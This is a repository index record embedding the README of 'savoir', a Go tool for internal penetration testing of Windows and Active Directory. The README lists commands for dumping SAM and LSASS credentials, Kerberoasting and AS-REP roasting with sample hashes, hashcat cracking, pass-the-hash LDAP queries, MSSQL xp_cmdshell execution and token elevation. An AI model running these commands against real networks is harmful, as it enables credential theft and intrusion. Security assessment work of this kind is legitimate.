{"id":40503519,"url":"https://github.com/vincd/savoir","last_synced_at":"2026-01-20T19:12:30.381Z","repository":{"id":37532891,"uuid":"450772481","full_name":"vincd/savoir","owner":"vincd","description":"Savoir is a tool to perform tasks during internal security assessment","archived":false,"fork":false,"pushed_at":"2022-06-27T10:48:47.000Z","size":475,"stargazers_count":18,"open_issues_count":0,"forks_count":3,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-06-19T06:54:03.361Z","etag":null,"topics":["kerberos","pentesting","security","windows"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vincd.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-01-22T09:30:49.000Z","updated_at":"2024-03-05T00:14:13.000Z","dependencies_parsed_at":"2022-08-02T01:20:02.514Z","dependency_job_id":null,"html_url":"https://github.com/vincd/savoir","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/vincd/savoir","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vincd%2Fsavoir","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vincd%2Fsavoir/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vincd%2Fsavoir/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vincd%2Fsavoir/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vincd","download_url":"https://codeload.github.com/vincd/savoir/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vincd%2Fsavoir/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28609893,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-20T18:56:40.769Z","status":"ssl_error","status_checked_at":"2026-01-20T18:54:26.653Z","response_time":117,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["kerberos","pentesting","security","windows"],"created_at":"2026-01-20T19:12:30.261Z","updated_at":"2026-01-20T19:12:30.363Z","avatar_url":"https://github.com/vincd.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Savoir\n\nSavoir is a tool to perform tasks during internal security assessment.\nThis project help me to understand how some pentest tools works.\n\n\n## Build\n\nYou can build `savoir` for multiple platforms:\n\n```bash\nmake update\nmake build\n```\n\nThe `build` folder contains build for multiple OS and architectures.\n\n\n## Commands\n\n### sam\n\n```bash\nsavoir sam local # Windows only\nsavoir sam hive --sam \u003cpath/to/sam\u003e --system \u003cpath/to/system\u003e\nsavoir sam shadowcopies # Windows only\n```\n\n\n### lsass\n\n```bash\nsavoir lsass process --json # Windows only\nsavoir lsass minidump --path /path/to/lsass.dmp --json\n```\n\n### kerberos\n\n\n#### Ask a TGT then a TGS\n\nYou can also ask a TGS, `savoir` will ask for a `TGT` first\n\n```bash\nsavoir kerberos asktgs --dc-ip \u003cDC-IP\u003e -d ubh.lab -u dany -p dany -e rc4 -r karen\n$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$858129adc693b1a8bb62e50a51b4ffc2$9b2b...\n```\n\nYou can ask a `TGT` save it to a `kirbi` files then ask for a `TGS`:\n\n```bash\n# Ask a TGT and save it to dany.kirbi\nsavoir kerberos asktgt --dc-ip \u003cDC-IP\u003e -d ubh.lab -u dany -p dany -e rc4 -o dany.kirbi\nTGT saved to dany.kirbi.\n\n# Display the TGT\nsavoir kerberos describe --ticket dany.kirbi\nServiceName              :  krbtgt/ubh.lab\nServiceRealm             :  UBH.LAB\nUserName                 :  dany\nUserRealm                :  UBH.LAB\nStartTime                :  2022-01-22 09:12:55 +0000 UTC\nEndTime                  :  2022-01-22 19:12:55 +0000 UTC\nRenewTill                :  2022-01-29 09:12:55 +0000 UTC\nFlags                    :  forwardable ; proxiable ; renewable ; initial ; pre-authent\nKeyType                  :  arcfour-hmac-md5\nBase64(key)              :  9CrwY3aAdXdr91h7uGi9qg==\n\n# Ask a TGS using this TGT\nsavoir kerberos asktgs --dc-ip \u003cDC-IP\u003e -d ubh.lab -t dany.kirbi -e rc4 -r karen\n$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$ef59ed1f3fdfddf356dd93823ad8208f$228920...\n```\n\n\n#### Generate Kerberos keys\n\nNote that `RC4` key is the `NTLM` hash `(MD4(UNICODE(password)))`\n\n```bash\nsavoir kerberos keys --password 'Pa$$w0rd' --salt 'CONTOSO.COMAdministrator'\narcfour-hmac-md5\n  Key: 92937945b518814341de3f726500d4ff\n  Iterations: 00001000\n\naes128-cts-hmac-sha1-96\n  Key: bd75e98362b16649ffbaed630d5341d0\n  Iterations: 00001000\n\naes256-cts-hmac-sha1-96\n  Key: 660e61042b190b5724c62bb473facca12058fb9ad3c03c0d2809f839c0352502\n  Iterations: 00001000\n```\n\n\n#### AS-REP roasting\n\nA User account may have the option `Do not require Kerberos preauthentication`\nchecked.\n\n```bash\n# target a specific user\nsavoir kerberos asreproast --dc-ip \u003cDOMAIN_IP\u003e -d \u003cDOMAIN\u003e -u \u003cUSERNAME\u003e --format=john\n# target all users in domain\nsavoir kerberos asreproast --dc-ip \u003cDOMAIN_IP\u003e -d \u003cDOMAIN\u003e --ldap-user \u003cLDAP_USERNAME\u003e --ldap-password \u003cLDAP_PASSWORD\u003e rc4 --format=john\n```\n\n\n#### Kerberoasting\n\n```bash\n# target a specific SPN\nsavoir kerberos asktgs --dc-ip \u003cDOMAIN_IP\u003e -d \u003cDOMAIN\u003e -u \u003cUSERNAME\u003e -p \u003cUSER_PASSWORD\u003e --spn \u003cSPN\u003e --output \u003cHASHES\u003e\n# target all SPN in the domain (use the same credentials to query LDAP or use an other account)\nsavoir kerberos asktgs --dc-ip \u003cDOMAIN_IP\u003e -d \u003cDOMAIN\u003e -u \u003cUSERNAME\u003e -p \u003cUSER_PASSWORD\u003e --ldap --output \u003cHASHES\u003e\n# Recover the password\nhashcat -m 13100 -a 0 \u003cHASHES\u003e \u003cPASSWORDS\u003e\n```\n\n\n### LDAP\n\n```bash\n# Use a domain account with a password\nsavoir ldap query -H \u003cLDAP_HOSTNAME\u003e -d \u003cDOMAIN\u003e -u \u003cUSERNAME\u003e -p \u003cPASSWORD\u003e -q \u003cQUERY\u003e\nsavoir ldap query -H \u003cLDAP_HOSTNAME\u003e -d \u003cDOMAIN\u003e -u \u003cUSERNAME\u003e -n \u003cNTLM_HASH\u003e -q \u003cQUERY\u003e\n```\n\n\n### MSSQL\n\n```bash\nsavoir mssql query -H \u003cMSSQL_HOSTNAME\u003e -t \u003cKRB_TICKET\u003e -q \u003cSQL_QUERY\u003e\nsavoir mssql xp_cmdshell -H \u003cMSSQL_HOSTNAME\u003e -t \u003cKRB_TICKET\u003e -c \u003cCMD\u003e\n```\n\n\n### token\n\n```bash\nsavoir token elevate -x cmd.exe # Windows only\n```\n\n\n### webscreenshot\n\nThis command take a screenshot of a URL using a headless browser.\n\n```bash\nsavoir webscreenshot --url {url} --renderer {chrome|chromium|firefox} --renderer-path {path}\n```\n\n### Scanner\n\n#### TCP Scanner\n\nThis is a TCP connect scanner using Go `net.Dialer` to test if there is\nopned services.\n\n```bash\nsavoir scanner tcp --host scanme.nmap.org --json\n```\n\n### Log level\n\nChange log output with the environnement variable `SAVOIR_LOGGER_LEVEL`:\n\n```bash\nSAVOIR_LOGGER_LEVEL=warn savoir ...\n```\n\nPossible values are: `debug`, `warn`, `info` and `error`.\n\n\n## Credits\n\n- [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz)\n- [skelsec/pypykatz](https://github.com/skelsec/pypykatz)\n- [SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket)\n- [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)\n- [jcmturner/gokrb5](https://github.com/jcmturner/gokrb5)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincd%2Fsavoir","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvincd%2Fsavoir","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincd%2Fsavoir/lists"}